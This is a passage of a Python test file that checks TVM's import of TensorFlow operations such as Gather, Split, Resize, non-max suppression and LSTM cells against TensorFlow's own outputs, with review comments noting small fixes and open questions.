    """TruncateMod op test with an int32 3-D tensor."""
    _test_forward_truncatemod((4, 3, 7), "int32")
#######################################################################
# Gather, GatherV2
# --------------------------
def _test_gather(ip_shape, indice_shape, indice_value, axis, dtype):
    """One iteration of GatherV2: gather `indice_value` along `axis`.

    `indice_value` may be a plain int or a nested list; it is normalized
    to an int32 numpy array before being fed.
    """
    tf.reset_default_graph()
    with tf.Graph().as_default():
        in_data = tf.placeholder(dtype, ip_shape, name="in_data")
        indices = tf.placeholder("int32", indice_shape, name="indices")
        out = tf.gather(in_data, indices, axis=axis)
        np_data = np.random.uniform(1, 10, size=ip_shape).astype(dtype)

        def _fill_indices(indice_value):
            # BUG FIX: dropped a dead `indices = np.array(ip_shape, dtype=dtype)`
            # assignment that was unconditionally overwritten below.
            if isinstance(indice_value, int):
                return np.array([indice_value], dtype="int32")
            return np.asarray(indice_value, dtype="int32")

        np_indices = _fill_indices(indice_value)
        compare_tf_with_tvm([np_data, np_indices], ["in_data:0", "indices:0"], out.name)
def test_forward_gather():
    """test Gather/GatherV2 layer"""
    cases = [
        ((4,), (1,), 1, 0, "int32"),
        ((4,), (1,), 1, 0, "float32"),
        ((1, 4), (1,), [0], 0, "int32"),
        ((4,), (1, 2, 2), [[[1, 0], [0, 1]]], 0, "float32"),
        ((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, "int32"),
        ((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 1, "int32"),
        ((2, 2), (1, 2, 2), [[[1, 0], [0, 1]]], 0, "float32"),
        ((3, 3, 3), (1, 1, 2), [[[1, 0]]], 0, "int32"),
        ((3, 3, 3), (1, 1, 2), [[[1, 0]]], 2, "int32"),
        ((4, 3, 5, 6), (1, 4), [[2, 1, 0, 0]], 0, "float32"),
    ]
    for ip_shape, indice_shape, indice_value, axis, dtype in cases:
        _test_gather(ip_shape, indice_shape, indice_value, axis, dtype)
#######################################################################
# GatherND
# --------------------------
def _test_gather_nd(ip_shape, indice_value, dtype):
    """One GatherNd iteration; the indices are embedded as a constant."""
    input_np = np.random.uniform(1, 100, size=ip_shape).astype(dtype)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        in_data = tf.placeholder(dtype, ip_shape, name="in_data")
        tf.gather_nd(in_data, indices=indice_value, name="gather_nd")
        compare_tf_with_tvm([input_np], ["in_data:0"], "gather_nd:0")
def test_forward_gather_nd():
    """test operator GatherNd"""
    _test_gather_nd((2, 2), [[0, 0], [1, 1]], "float32")
    _test_gather_nd((2, 2, 2), [[1, 0, 0], [0, 0, 0]], "float32")
    _test_gather_nd((4,), [1], "float32")
    _test_gather_nd((4,), [1], "int32")
    _test_gather_nd((1, 4), [0, 3], "int32")
    _test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "int32")
    _test_gather_nd((2, 2), [[[1, 0], [0, 1]]], "float32")
    # This case was listed twice with identical arguments; run it once.
    _test_gather_nd((3, 3, 3), [[[1, 0]]], "int32")
    _test_gather_nd((4, 3, 5, 6), [[2, 1, 0, 0]], "float32")
    _test_gather_nd((3, 3, 3), [[[2, 1]]], "int32")
#######################################################################
# BiasAdd
# -------
def test_forward_bias_add():
    """test Op BiasAdd"""

    def check_bias_add(lhs_shape, rhs_shape, dtype):
        # Fresh graph per case; bias add of a random value tensor + bias vector.
        tf.reset_default_graph()
        lhs = np.random.uniform(size=lhs_shape).astype(dtype)
        rhs = np.random.uniform(size=rhs_shape).astype(dtype)
        with tf.Graph().as_default():
            lft_data = tf.placeholder(dtype, name="lft_data")
            rgt_data = tf.placeholder(dtype, name="rgt_data")
            tf.nn.bias_add(lft_data, rgt_data, name="BiasAdd")
            compare_tf_with_tvm([lhs, rhs], ["lft_data:0", "rgt_data:0"], "BiasAdd:0")

    check_bias_add((10, 8, 16, 32), (32,), dtype="int32")
    check_bias_add((10, 20), (20,), dtype="float32")
#######################################################################
# Split
# -----
def _test_split(in_shape, axis, num_or_size_splits, dtype):
    """One iteration of Split, alone and round-tripped through Concat.

    *num_or_size_splits* may be an int (number of even splits) or a list of
    section sizes, exactly as accepted by ``tf.split``.
    """
    # NOTE: the original computed an unused ``num_split`` local (dead code,
    # removed) and placed this docstring after the first statement.
    np_data = np.random.uniform(-5, 5, size=in_shape).astype(dtype)

    # Split followed by a per-output ReLU so every split output is consumed.
    tf.reset_default_graph()
    with tf.Graph().as_default():
        in_data = tf.placeholder(dtype, in_shape, name="in_data")
        split = tf.split(in_data, num_or_size_splits, axis=axis)
        relu = [tf.nn.relu(i) for i in split]
        compare_tf_with_tvm([np_data], ["in_data:0"], [n.name for n in relu])

    # And now test together with concat: split then re-concatenate along axis.
    tf.reset_default_graph()
    with tf.Graph().as_default():
        in_data = tf.placeholder(dtype, in_shape, name="in_data")
        splitted = tf.split(in_data, num_or_size_splits, axis=axis)
        concat = tf.concat(splitted, axis)
        compare_tf_with_tvm([np_data], "in_data:0", concat.name)
def test_forward_split():
    """test split layer"""
    cases = [
        # rank 1
        ((3,), 0, 1, "float32"),
        ((3,), 0, 3, "float32"),
        ((6,), 0, 3, "float32"),
        # rank 2
        ((6, 2), 0, 3, "float32"),
        ((2, 6), 1, 6, "float32"),
        # rank 3
        ((6, 2, 4), 0, 2, "int32"),
        ((2, 6, 4), 1, 3, "float32"),
        ((2, 4, 6), 2, 1, "float32"),
        # rank 4
        ((6, 1, 3, 5), 0, 3, "float32"),
        ((1, 6, 3, 5), 1, 3, "float32"),
        ((1, 3, 6, 5), 2, 3, "float32"),
        ((1, 3, 5, 6), 3, 3, "float32"),
        # split along negative axis
        ((6, 1, 3, 5), -4, 3, "float32"),
        ((1, 6, 3, 5), -3, 3, "float32"),
        ((1, 3, 6, 5), -2, 3, "float32"),
        ((1, 3, 5, 6), -1, 3, "float32"),
        # size_splits given as a list of section sizes
        ((6,), 0, [1, 2, 3], "int32"),
        ((3, 6, 4), -2, [1, 4, 1], "float32"),
    ]
    for shape, axis, splits, dtype in cases:
        _test_split(shape, axis, splits, dtype)
######################################################################
# TopKV2
# ------
def _test_forward_top_k_v2(in_shape, k):
    """One iteration of TopKV2 taking the k largest of a random float tensor."""
    values = np.random.uniform(-100, 100, size=in_shape).astype("float32")
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = tf.placeholder("float32", in_shape, name="in_data")
        tf.math.top_k(placeholder, k, name="TopK")
        compare_tf_with_tvm([values], ["in_data:0"], "TopK:0")
def test_forward_top_k_v2():
    """test TopKV2 layer"""
    _test_forward_top_k_v2((3,), 1)
    _test_forward_top_k_v2((3,), 3)
    # This case was listed twice with identical arguments; run it once.
    _test_forward_top_k_v2((3, 5, 7), 3)
#######################################################################
# Unstack
# -------
def _test_unstack(ip_shape, axis, dtype):
    """Unstack along *axis*, alone and round-tripped through stack."""
    sample = np.random.uniform(-5, 5, size=ip_shape).astype(dtype)

    # Unstack with every resulting tensor checked individually.
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = tf.placeholder(dtype, ip_shape, name="in_data")
        pieces = tf.unstack(placeholder, axis=axis)
        compare_tf_with_tvm([sample], ["in_data:0"], [p.name for p in pieces])

    # Round trip: unstack then stack back along the same axis.
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = tf.placeholder(dtype, ip_shape, name="in_data")
        tf.stack(tf.unstack(placeholder, axis=axis), axis=axis)
        compare_tf_with_tvm([sample], ["in_data:0"], "stack:0")
def test_forward_unstack():
    """test unstack layer"""
    cases = [
        ((6,), 0, "int32"),
        ((2, 6), 1, "float64"),
        # negative axis
        ((1, 4), -1, "int32"),
        ((3, 6, 4), -2, "float32"),
    ]
    for shape, axis, dtype in cases:
        _test_unstack(shape, axis, dtype)
#######################################################################
# Tile
# ----
def _test_tile(in_shape, multiples, dtype):
    """One iteration of Tile with per-axis repetition counts *multiples*."""
    sample = np.random.uniform(-5, 5, size=in_shape).astype(dtype)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = tf.placeholder(dtype, in_shape, name="in_data")
        tf.tile(placeholder, multiples=multiples, name="tile")
        compare_tf_with_tvm([sample], ["in_data:0"], "tile:0")
def test_forward_tile():
    """test Tile"""
    for shape, reps, dtype in [
        ((2,), (3,), "int32"),
        ((2, 2), (2, 3), "float32"),
        ((2, 4, 6), (6, 7, 8), "float64"),
    ]:
        _test_tile(shape, reps, dtype)
#######################################################################
# ClipByValue
# -----------
def _test_forward_clip_by_value(ip_shape, clip_value_min, clip_value_max, dtype):
    """One iteration of ClipByValue clamping a random tensor to [min, max]."""
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = tf.placeholder(dtype, ip_shape, name="in_data")
        tf.clip_by_value(placeholder, clip_value_min, clip_value_max, name="ClipByValue")
        sample = np.random.uniform(-100, 100, size=ip_shape).astype(dtype)
        compare_tf_with_tvm([sample], ["in_data:0"], "ClipByValue:0")
def test_forward_clip_by_value():
    """test ClipByValue op"""
    # Normalize both sides of the comparison: the original compared a plain
    # str against a LooseVersion, which only works via the reflected
    # operator. Semantics are unchanged.
    # NOTE(review): the gate direction looks suspicious — it only runs the
    # test on TF *older* than 1.9. Confirm whether ">=" was intended.
    if LooseVersion(tf.__version__) < LooseVersion("1.9"):
        _test_forward_clip_by_value((4,), 0.1, 5.0, "float32")
        _test_forward_clip_by_value((4, 4), 1, 5, "int32")
#######################################################################
# Multi Input to graph
# --------------------
def test_forward_multi_input():
    """Graph with four inputs combined through add/subtract/multiply."""
    with tf.Graph().as_default():
        in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
        in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
        in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
        in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
        summed = tf.add(in1, in2, name="out1")
        diffed = tf.subtract(in3, in4, name="out2")
        tf.multiply(summed, diffed, name="out")
        sample = np.arange(9, dtype="int32").reshape([3, 3])
        compare_tf_with_tvm(
            [sample] * 4, ["in1:0", "in2:0", "in3:0", "in4:0"], "out:0"
        )
#######################################################################
# Multi Output to Graph
# ---------------------
def test_forward_multi_output():
    """Graph with two outputs; every TF output is compared against TVM."""
    with tf.Graph().as_default():
        in1 = tf.placeholder(tf.int32, shape=[3, 3], name="in1")
        in2 = tf.placeholder(tf.int32, shape=[3, 3], name="in2")
        in3 = tf.placeholder(tf.int32, shape=[3, 3], name="in3")
        in4 = tf.placeholder(tf.int32, shape=[3, 3], name="in4")
        out1 = tf.add(in1, in2, name="out1")
        out2 = tf.subtract(in3, in4, name="out2")
        in_data = np.arange(9, dtype="int32").reshape([3, 3])
        in_data = [in_data] * 4
        in_name = ["in1:0", "in2:0", "in3:0", "in4:0"]
        out_name = ["out1:0", "out2:0"]
        # BUG FIX: str.strip(":0") strips the *characters* ':' and '0' from
        # both ends (e.g. "out0:0" -> "out"); drop the tensor index with
        # split(":") instead.
        out_node = [out.split(":")[0] for out in out_name]
        in_node = [inp.split(":")[0] for inp in in_name]
        with tf.Session() as sess:
            final_graph_def = tf.graph_util.convert_variables_to_constants(
                sess,
                sess.graph.as_graph_def(add_shapes=True),
                out_node,
            )
            tf_output = run_tf_graph(sess, in_data, in_name, out_name)
            tvm_output = run_tvm_graph(
                final_graph_def, in_data, in_node, target="llvm", out_names=out_node, num_output=2
            )
            for tf_out, tvm_out in zip(tf_output, tvm_output):
                tvm.testing.assert_allclose(tf_out, tvm_out, atol=1e-5, rtol=1e-5)
#######################################################################
# Resize Bilinear, Nearest_Neighbor
# ---------------------------------
def _test_resize_bilinear(in_shape, to_shape, align_corners):
    """One iteration of bilinear resize with a constant target shape."""
    sample = np.random.uniform(size=in_shape).astype("float32")
    target = np.array(to_shape).astype("int32")
    with tf.Graph().as_default():
        in_data = array_ops.placeholder(shape=sample.shape, dtype=sample.dtype)
        target_const = constant_op.constant(target, shape=target.shape, dtype=target.dtype)
        tf.image.resize_bilinear(in_data, target_const, align_corners=align_corners)
        compare_tf_with_tvm(sample, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_bilinear_from_tensor(in_shape, align_corners):
    """Bilinear resize whose output shape is a tensor, not a constant.

    The height/width dims of the placeholder are left dynamic, so the
    importer must infer the output shape via value inference.
    """
    sample = np.random.uniform(size=in_shape).astype("float32")
    with tf.Graph().as_default():
        in_data = array_ops.placeholder(
            shape=[in_shape[0], None, None, in_shape[3]], dtype=sample.dtype
        )
        dynamic_hw = tf.shape(in_data)[1:3]
        tf.image.resize_bilinear(in_data, dynamic_hw, align_corners=align_corners)
        compare_tf_with_tvm(sample, "Placeholder:0", "ResizeBilinear:0")
def _test_resize_nearest_neighbor(in_shape, to_shape):
    """One iteration of nearest-neighbor resize with a constant target shape."""
    sample = np.random.uniform(size=in_shape).astype("float32")
    target = np.array(to_shape).astype("int32")
    with tf.Graph().as_default():
        in_data = array_ops.placeholder(shape=sample.shape, dtype=sample.dtype)
        target_const = constant_op.constant(target, shape=target.shape, dtype=target.dtype)
        tf.image.resize_nearest_neighbor(in_data, target_const, name="resize_nearest_neighbor")
        compare_tf_with_tvm(sample, "Placeholder:0", "resize_nearest_neighbor:0")
def _test_resize_nearest_neighbor_dynamic_shape(in_shape, scale):
    """Nearest-neighbor resize on a graph whose input shape is fully dynamic."""
    sample = np.random.uniform(size=in_shape).astype("float32")
    with tf.Graph().as_default():
        in_data = array_ops.placeholder(shape=None, dtype=sample.dtype)
        # Output H/W = input H/W scaled elementwise by the given factors.
        scaled_hw = tf.shape(in_data)[1:3] * tf.constant(scale, dtype=tf.int32)
        tf.image.resize_nearest_neighbor(in_data, scaled_hw, name="resize_nearest_neighbor")
        compare_tf_with_tvm(sample, "Placeholder:0", "resize_nearest_neighbor:0")
def test_forward_resize():
    """Resize Bilinear, Nearest_Neighbor"""
    # TF default layout is NHWC.
    _test_resize_bilinear((4, 32, 32, 3), [50, 50], False)
    _test_resize_bilinear((6, 32, 32, 3), [20, 20], True)
    _test_resize_bilinear_from_tensor((4, 32, 32, 3), False)
    _test_resize_bilinear_from_tensor((6, 50, 50, 3), True)
    _test_resize_nearest_neighbor((6, 32, 32, 3), [20, 20])
    _test_resize_nearest_neighbor_dynamic_shape((1, 16, 16, 3), scale=[2, 2])
#######################################################################
# BroadcastTo
# -----------
def _test_broadcast_to(in_shape, to_shape):
    """One iteration of BroadcastTo with a constant target shape."""
    sample = np.random.uniform(size=in_shape).astype("float32")
    target = np.array(to_shape).astype("int32")
    with tf.Graph().as_default():
        in_data = array_ops.placeholder(shape=sample.shape, dtype=sample.dtype)
        target_const = constant_op.constant(target, shape=target.shape, dtype=target.dtype)
        tf.broadcast_to(in_data, target_const)
        # opt_level=0 keeps the op from being constant-folded away.
        compare_tf_with_tvm(sample, "Placeholder:0", "BroadcastTo:0", opt_level=0)
def _test_broadcast_to_from_tensor(in_shape):
    """BroadcastTo whose target shape is unknown at graph-build time."""
    sample = np.random.uniform(size=in_shape).astype("float32")
    with tf.Graph().as_default():
        in_data = array_ops.placeholder(shape=[None], dtype=sample.dtype)
        # Target shape computed from the (dynamic) input shape at runtime.
        dynamic_shape = tf.multiply(tf.shape(in_data), 32)
        tf.broadcast_to(in_data, dynamic_shape)
        compare_tf_with_tvm(sample, "Placeholder:0", "BroadcastTo:0")
def test_forward_broadcast_to():
    """test BroadcastTo"""
    # (Docstring fixed: it previously said "Resize Bilinear" — copy-paste error.)
    _test_broadcast_to((4, 1, 32, 32), [4, 8, 32, 32])
    _test_broadcast_to((6, 32, 32, 1), [6, 32, 32, 16])
    _test_broadcast_to_from_tensor((1))
#######################################################################
# Fill
# ----
def _test_fill(in_shape):
    """Use the fill op to create a tensor of ones with non-constant shape."""
    with tf.Graph().as_default():
        ones = tf.ones(shape=in_shape, dtype="float32")
        # The shape itself is passed as the (unused-placeholder) input data.
        compare_tf_with_tvm(in_shape, [], "ones:0", opt_level=1)
def _test_fill_from_tensor(in_shape):
    """Fill (ones) with a shape derived from a partially-dynamic tensor.

    Extra ops (reduce_mean + add) keep the graph from being fully constant
    and folded away before conversion.
    """
    sample = np.random.uniform(size=in_shape).astype("float32")
    with tf.Graph().as_default():
        in_data = array_ops.placeholder(
            shape=[in_shape[0], in_shape[1], None, None], dtype=sample.dtype
        )
        ones = tf.ones(shape=2 * tf.shape(in_data), dtype=sample.dtype)
        tf.math.add(in_data, tf.reduce_mean(ones), name="out1")
        compare_tf_with_tvm(sample, "Placeholder:0", "out1:0")
def _test_fill_symbolic_inputs(in_shape_data, in_value_data, dtype):
    """Fill where both the shape and the fill value arrive via placeholders."""
    with tf.Graph().as_default():
        shape_ph = tf.placeholder(shape=[in_shape_data.shape[0]], dtype=in_shape_data.dtype)
        value_ph = tf.placeholder(shape=(), dtype=dtype)
        filled = tf.fill(shape_ph, value_ph)
        for mode in ("debug", "vm"):
            compare_tf_with_tvm(
                [in_shape_data, in_value_data], [shape_ph.name, value_ph.name], filled.name, mode=mode
            )
def test_forward_fill():
    """test Fill op"""
    # (Docstring fixed: it previously said "Resize Bilinear" — copy-paste error.)
    _test_fill((32))
    _test_fill((6, 32, 64, 64))
    _test_fill_from_tensor((6, 32, 64, 64))
    _test_fill_symbolic_inputs(np.array((2,)), np.int32(9), tf.int32)
    _test_fill_symbolic_inputs(np.array((2, 3)), 9, tf.int64)
    _test_fill_symbolic_inputs(np.array((2, 3, 4)), np.float32(9.0), tf.float32)
#######################################################################
# Crop to bounding box
# --------------------
def _test_crop(in_shape, off_h, off_w, tar_h, tar_w):
    """One iteration of crop_to_bounding_box at the given offset and size."""
    sample = np.random.uniform(size=in_shape).astype("float32")
    with tf.Graph().as_default():
        in_data = array_ops.placeholder(shape=sample.shape, dtype=sample.dtype)
        tf.image.crop_to_bounding_box(in_data, off_h, off_w, tar_h, tar_w)
        compare_tf_with_tvm(sample, "Placeholder:0", "crop_to_bounding_box/Slice:0")
def test_forward_crop():
    """Crop to bounding box"""
    _test_crop(in_shape=(1, 224, 224, 3), off_h=20, off_w=20, tar_h=120, tar_w=120)
#######################################################################
# CropAndResize
# -------------
def _test_forward_crop_and_resize(
    img_shape,
    boxes,
    box_idx,
    crop_size,
    extrapolation_value=0.0,
    method="bilinear",
    dtype="float32",
):
    """One iteration of CropAndResize over a random image batch."""
    sample = np.random.uniform(0, 10, size=img_shape).astype(dtype)
    tf.reset_default_graph()
    with tf.Graph().as_default():
        placeholder = array_ops.placeholder(dtype, sample.shape, name="in_data")
        tf.image.crop_and_resize(
            placeholder,
            boxes=boxes,
            box_ind=box_idx,
            crop_size=crop_size,
            method=method,
            extrapolation_value=extrapolation_value,
            name="crop_and_resize",
        )
        compare_tf_with_tvm([sample], ["in_data:0"], "crop_and_resize:0")
def test_forward_crop_and_resize():
    """CropAndResize"""
    # Single-box cases: (img_shape, boxes, box_idx, crop_size, extrapolation, method).
    single_box_cases = [
        ([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.0, "bilinear"),
        ([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2, "bilinear"),
        ([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2, "nearest"),
        ([1, 11, 11, 3], [[0.3, 0.3, 1, 1]], [0], [21, 21], 0.0, "bilinear"),
        ([1, 41, 41, 3], [[0.2, 0.4, 0.8, 0.8]], [0], [21, 11], 0.0, "bilinear"),
        ([1, 100, 100, 3], [[0, 0, 0.9, 0.9]], [0], [30, 30], 0.0, "bilinear"),
        ([1, 224, 224, 3], [[0.1, 0.2, 1, 1]], [0], [9, 9], 0.0, "bilinear"),
        ([1, 249, 249, 3], [[0, 0, 1, 1]], [0], [9, 9], 0.0, "bilinear"),
        ([1, 201, 301, 3], [[0.2, 0.3, 0.7, 0.8]], [0], [51, 51], 0.0, "bilinear"),
    ]
    for img_shape, boxes, box_idx, crop_size, extrapolation, method in single_box_cases:
        _test_forward_crop_and_resize(
            img_shape, boxes, box_idx, crop_size, extrapolation, method
        )
    # Batched multi-box cases.
    _test_forward_crop_and_resize(
        img_shape=[10, 11, 11, 3],
        boxes=[[0, 0, 0.9, 0.9], [0.2, 0.2, 0.8, 0.8]],
        box_idx=[0, 1],
        crop_size=[5, 5],
    )
    _test_forward_crop_and_resize(
        img_shape=[20, 576, 576, 3],
        boxes=[[0, 0, 1, 1], [0, 0, 0.8, 0.8], [0.1, 0.2, 0.9, 1], [0.2, 0, 1, 1]],
        box_idx=[1, 0, 2, 3],
        crop_size=[24, 24],
        extrapolation_value=0.3,
    )
    _test_forward_crop_and_resize(
        img_shape=[20, 229, 229, 3],
        boxes=[[0, 0, 0.9, 0.9], [0.3, 0.3, 1, 1], [0.2, 0.1, 0.7, 0.8], [0, 0, 1, 1]],
        box_idx=[3, 0, 2, 1],
        crop_size=[58, 58],
        extrapolation_value=0.2,
        method="nearest",
    )
#######################################################################
# Non Max Suppression
# -------------------
def _test_forward_nms_v3(
    bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
    """One NonMaxSuppressionV3 iteration, checked in both vm and debug modes."""
    boxes_np = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
    scores_np = np.random.uniform(size=score_shape).astype(dtype)
    size_np = np.int32(out_size)
    tf.reset_default_graph()
    boxes_ph = tf.placeholder(dtype, boxes_np.shape, name="in_data_1")
    scores_ph = tf.placeholder(dtype, scores_np.shape, name="in_data_2")
    size_ph = tf.placeholder(tf.int32, name="in_data_3")
    tf.image.non_max_suppression(
        boxes=boxes_ph,
        scores=scores_ph,
        max_output_size=size_ph,
        iou_threshold=iou_threshold,
        score_threshold=score_threshold,
        name="nms",
    )
    feed_values = [boxes_np, scores_np, size_np]
    feed_names = ["in_data_1:0", "in_data_2:0", "in_data_3:0"]
    for mode in ("vm", "debug"):
        compare_tf_with_tvm(feed_values, feed_names, "nms/NonMaxSuppressionV3:0", mode=mode)
def _test_forward_nms_v4(
    bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
    """One padded-NMS (NonMaxSuppressionV4) iteration, checked in vm and debug modes."""
    # Random boxes in [0, 10) and scores in [0, 1); the max output size is
    # fed through a scalar int32 placeholder.
    boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
    scores = np.random.uniform(size=score_shape).astype(dtype)
    max_output_size = np.int32(out_size)
    tf.reset_default_graph()
    in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
    in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
    in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
    # pad_to_max_output_size=True makes the op emit a fixed-size index
    # tensor plus the count of valid entries.
    indices_padded, num_valid = tf.image.non_max_suppression_padded(
        boxes=in_data_1,
        scores=in_data_2,
        max_output_size=in_data_3,
        iou_threshold=iou_threshold,
        score_threshold=score_threshold,
        name="nms",
        pad_to_max_output_size=True,
    )
    # Flatten both outputs, then slice off the padding so only the valid
    # indices take part in the comparison.
    num_valid = tf.reshape(num_valid, shape=(-1,))
    indices_padded = tf.reshape(indices_padded, shape=(-1,))
    tf.slice(indices_padded, tf.constant([0]), num_valid, name="SlicedIndices")
    # Compare the raw valid-count output (:1) and the sliced indices,
    # once per execution mode.
    compare_tf_with_tvm(
        [boxes, scores, max_output_size],
        ["in_data_1:0", "in_data_2:0", "in_data_3:0"],
        ["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
        mode="vm",
    )
    compare_tf_with_tvm(
        [boxes, scores, max_output_size],
        ["in_data_1:0", "in_data_2:0", "in_data_3:0"],
        ["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
        mode="debug",
    )
    # NOTE(review): this helper is not invoked by test_forward_nms below —
    # confirm whether V4 coverage was dropped intentionally.
def _test_forward_nms_v5(
    bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
    """One NonMaxSuppressionV5 (with-scores) iteration, checked in vm mode."""
    boxes_np = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
    scores_np = np.random.uniform(size=score_shape).astype(dtype)
    size_np = np.int32(out_size)
    tf.reset_default_graph()
    boxes_ph = tf.placeholder(dtype, boxes_np.shape, name="in_data_1")
    scores_ph = tf.placeholder(dtype, scores_np.shape, name="in_data_2")
    size_ph = tf.placeholder(tf.int32, name="in_data_3")
    tf.image.non_max_suppression_with_scores(
        boxes=boxes_ph,
        scores=scores_ph,
        max_output_size=size_ph,
        iou_threshold=iou_threshold,
        score_threshold=score_threshold,
        name="nms",
    )
    # Check both outputs: selected indices (:0) and selected scores (:1).
    compare_tf_with_tvm(
        [boxes_np, scores_np, size_np],
        ["in_data_1:0", "in_data_2:0", "in_data_3:0"],
        ["nms/NonMaxSuppressionV5:0", "nms/NonMaxSuppressionV5:1"],
        mode="vm",
    )
def test_forward_nms():
    """NonMaxSuppressionV3,5"""
    cases = [
        ((5, 4), (5,), 0.7, 0.5, 5),
        ((20, 4), (20,), 0.5, 0.6, 10),
        ((1000, 4), (1000,), 0.3, 0.7, 1000),
        ((2000, 4), (2000,), 0.4, 0.6, 7),
    ]
    for nms_fn in (_test_forward_nms_v3, _test_forward_nms_v5):
        for bx_shape, score_shape, iou_thresh, score_thresh, out_size in cases:
            nms_fn(bx_shape, score_shape, iou_thresh, score_thresh, out_size)
def _test_forward_combined_nms(
    bx_shape,
    score_shape,
    iou_threshold,
    score_threshold,
    out_size,
    total_size,
    clip_boxes=False,
    dtype="float32",
):
    """One CombinedNonMaxSuppression iteration, checked in vm mode."""
    boxes_np = np.random.uniform(-1, 2, size=bx_shape).astype(dtype)
    scores_np = np.random.uniform(size=score_shape).astype(dtype)
    size_np = np.int32(out_size)
    tf.reset_default_graph()
    boxes_ph = tf.placeholder(dtype, boxes_np.shape, name="in_data_1")
    scores_ph = tf.placeholder(dtype, scores_np.shape, name="in_data_2")
    size_ph = tf.placeholder(tf.int32, name="in_data_3")
    tf.image.combined_non_max_suppression(
        boxes=boxes_ph,
        scores=scores_ph,
        max_output_size_per_class=size_ph,
        max_total_size=total_size,
        iou_threshold=iou_threshold,
        score_threshold=score_threshold,
        pad_per_class=False,
        clip_boxes=clip_boxes,
        name="nms",
    )
    # All four outputs: boxes, scores, classes, valid detection count.
    output_names = [
        "nms/CombinedNonMaxSuppression:%d" % i for i in range(4)
    ]
    compare_tf_with_tvm(
        [boxes_np, scores_np, size_np],
        ["in_data_1:0", "in_data_2:0", "in_data_3:0"],
        output_names,
        mode="vm",
    )
def test_forward_combined_nms():
    """CombinedNonMaxSuppression"""
    _test_forward_combined_nms((1, 64, 1, 4), (1, 64, 1), 0.7, 0.5, 64, 64)
    _test_forward_combined_nms((1, 64, 1, 4), (1, 64, 20), 0.7, 0.5, 64, 10)
    # Per-class boxes, with box coordinates clipped to [0, 1].
    _test_forward_combined_nms((1, 64, 20, 4), (1, 64, 20), 0.7, 0.5, 64, 64, clip_boxes=True)
    # Batch of two images.
    _test_forward_combined_nms((2, 200, 1, 4), (2, 200, 1), 0.4, 0.6, 100, 100)
#######################################################################
# LSTM
# ----
def _test_lstm_cell(batch_size, num_hidden, num_layers, forget_bias, dtype):
    """One iteration of an LSTMBlockCell: run in TF, then compare TVM's outputs.

    NOTE(review): *num_layers* is accepted but never used — presumably a
    leftover parameter; confirm before extending.
    """
    tf.reset_default_graph()
    input_size = num_hidden
    # Constant inputs: all-ones data, 0.1-filled cell (c) and hidden (h) state.
    input_data = np.full((batch_size, input_size), 1.0, dtype=dtype)
    in_state_c = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
    in_state_h = np.full((batch_size, num_hidden), 0.1, dtype=dtype)

    def _get_tensorflow_output():
        # Build + run the cell under a variable scope with constant(0.5)
        # initializers so weights are deterministic, then freeze the graph.
        with tf.Session() as sess:
            with variable_scope.variable_scope(
                "root", initializer=init_ops.constant_initializer(0.5)
            ):
                m0 = tf.placeholder(dtype, [batch_size, num_hidden], name="m0")
                m1 = tf.placeholder(dtype, [batch_size, num_hidden], name="m1")
                x = tf.placeholder(shape=(batch_size, input_size), dtype=dtype, name="input")
                g, ((out_m0, out_m1)) = tensorflow.contrib.rnn.LSTMBlockCell(
                    num_hidden, forget_bias=forget_bias
                )(x, (m0, m1))
                sess.run([variables.global_variables_initializer()])
                # NOTE(review): x is fed a hard-coded 1x2 array here, matching
                # the caller's (batch_size=1, num_hidden=2) — not *input_data*.
                res = sess.run(
                    [g, out_m0, out_m1],
                    {
                        x.name: np.array([[1.0, 1.0]]),
                        m0.name: in_state_c,
                        m1.name: in_state_h,
                    },
                )
            graph_def = sess.graph.as_graph_def(add_shapes=True)
            final_graph_def = graph_util.convert_variables_to_constants(
                sess, graph_def, ["root/lstm_cell/LSTMBlockCell"]
            )
            return final_graph_def, res

    graph_def, tf_out = _get_tensorflow_output()
    tvm_output = run_tvm_graph(
        graph_def,
        [input_data, in_state_c, in_state_h],
        ["root/input", "root/m0", "root/m1"],
        num_output=7,
    )
    assert isinstance(tvm_output, list)
    # The LSTMBlockCell node has 7 outputs; index 6 is the cell output (g)
    # and index 1 matches TF's first returned state tensor.
    tvm.testing.assert_allclose(tf_out[0], tvm_output[6], rtol=1e-3, atol=1e-3)
    tvm.testing.assert_allclose(tf_out[1], tvm_output[1], rtol=1e-3, atol=1e-3)
def test_forward_lstm():
    """test LSTM block cell"""
    # tf.contrib.rnn.LSTMBlockCell was removed in TF 2.0, so skip on 2.x.
    if package_version.parse(tf.VERSION) >= package_version.parse("2.0.0"):
        return
    _test_lstm_cell(1, 2, 1, 0.5, "float32")
#######################################################################
# Pack
# ---
def _test_pack(axis, shape, **kwargs):
    """Stack two identical arange tensors along *axis* and compare with TVM."""
    first = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
    second = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
    with tf.Graph().as_default():
